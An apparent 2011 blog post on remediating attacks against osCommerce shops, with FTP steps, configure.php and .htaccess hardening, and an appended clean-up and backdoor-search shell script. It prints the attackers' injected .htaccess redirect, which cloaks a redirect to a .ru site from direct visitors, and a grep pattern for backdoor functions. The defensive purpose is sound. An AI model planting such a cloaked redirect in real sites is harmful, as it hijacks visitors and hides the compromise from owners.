Wednesday, August 10, 2011

Continuing attacks against osCommerce sites

If you're using osCommerce, the first thing to do is install the latest version. Second, remove the admin/file_manager.php file (the file manager is what the attackers use to upload their scripts) and rename your admin directory to something unpredictable. Log in via FTP or, preferably, SSH to do so; the last command below fetches configure.php so you can edit it locally:

ftp> delete admin/file_manager.php
ftp> rename admin admin-random-folder-name
ftp> cd admin-random-folder-name/includes
ftp> get configure.php 

Once you do that, edit configure.php (it lives in the includes/ folder of the renamed admin directory) so that the admin constants point to the new location, and upload it back:

define('DIR_WS_ADMIN', '/admin-random-folder-name/');
define('DIR_FS_ADMIN', DIR_FS_DOCUMENT_ROOT . DIR_WS_ADMIN);

If you can, also restrict access to the renamed admin directory to just a few IP addresses with a .htaccess file placed inside it (one allow from line per address; the Order line makes the deny-by-default behaviour explicit):

Order deny,allow
deny from all
allow from 

The next step is to remove the malicious entry from the site's .htaccess file. It generally looks like this: visitors arriving from a search engine are redirected to the attacker's site, while anyone typing the address directly (the site owner, typically) sees the shop as normal, which is why these infections go unnoticed for so long:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
..
RewriteRule ^(.*)$ http://devisionnetwork.ru/suomi/index.php [R=301,L] 

Make sure to also look for backdoors (scripts that would give the attackers access back to your site after the clean-up) and remove them, otherwise the .htaccess entry will simply reappear.
As far as the attacks go, they're being managed by at least two IP addresses (91.204.48.37 and 94.103.151.195), so it is worth blocking both and checking your access logs for requests from them.
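The clean-up steps above, combined into one SSH session, as an added example that is not part of the original post and not osCommerce's own tooling. The document root, the new admin directory name and the allowed IP addresses are assumptions supplied by the caller; the backdoor search is a heuristic (it lists PHP files calling the usual obfuscation and execution functions) and every hit still needs a manual look before deleting it.

```shell
#!/bin/sh
# Added example: osCommerce clean-up helpers run over SSH instead of FTP.
# Assumptions: the shop's document root is passed as $root, the admin
# directory is $root/admin, and the caller picks the new admin name and
# the IP addresses allowed to reach it.

# Steps 1-2: drop the file manager, then rename the admin directory.
rename_admin() {
    root="$1"; newname="$2"
    rm -f "$root/admin/file_manager.php"
    mv "$root/admin" "$root/$newname"
}

# Step 3: point DIR_WS_ADMIN in admin/includes/configure.php at the new
# directory name, whatever the old value was. DIR_FS_ADMIN is derived
# from DIR_WS_ADMIN, so it needs no change.
update_configure() {
    conf="$1"; newname="$2"
    sed -i.bak "s#define('DIR_WS_ADMIN', *'[^']*');#define('DIR_WS_ADMIN', '/$newname/');#" "$conf"
    rm -f "$conf.bak"
}

# Step 4: write a deny-by-default .htaccess into the renamed admin
# directory, allowing only the addresses given as extra arguments.
write_admin_htaccess() {
    dir="$1"; shift
    {
        echo "Order deny,allow"
        echo "deny from all"
        for ip in "$@"; do echo "allow from $ip"; done
    } > "$dir/.htaccess"
}

# Step 5: remove the injected redirect from the site's .htaccess.
# The injection is a run of RewriteCond lines testing HTTP_REFERER
# followed by a RewriteRule sending visitors to an off-site http(s) URL.
# Only such runs are deleted; RewriteEngine On and any other rules stay.
clean_htaccess() {
    file="$1"
    awk '
        /^[ \t]*RewriteCond[ \t]+%.HTTP_REFERER./ { buf = buf $0 "\n"; next }
        /^[ \t]*RewriteRule/ && buf != "" {
            if ($0 ~ /https?:\/\//) { buf = ""; next }   # off-site redirect: drop the run
            printf "%s", buf; buf = ""; print; next       # local rule: keep the run
        }
        { if (buf != "") { printf "%s", buf; buf = "" } print }
        END { printf "%s", buf }
    ' "$file" > "$file.tmp" && mv "$file.tmp" "$file"
}

# Step 6: list PHP files that look like backdoors. Heuristic only:
# review each hit, since some legitimate code also uses these functions.
find_backdoors() {
    root="$1"
    grep -rlE --include='*.php' \
        'eval\(|base64_decode\(|gzinflate\(|str_rot13\(|passthru\(|shell_exec\(' \
        "$root" 2>/dev/null
}

# Typical session (paths and names are placeholders):
#   rename_admin /var/www/shop admin-k7q2
#   update_configure /var/www/shop/admin-k7q2/includes/configure.php admin-k7q2
#   write_admin_htaccess /var/www/shop/admin-k7q2 203.0.113.5
#   clean_htaccess /var/www/shop/.htaccess
#   find_backdoors /var/www/shop
```

The .htaccess cleaner is deliberately conservative: a RewriteCond block on the referer that ends in a rule rewriting to a local path is left alone, so legitimate hotlink-protection rules survive while the search-engine redirect is removed.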
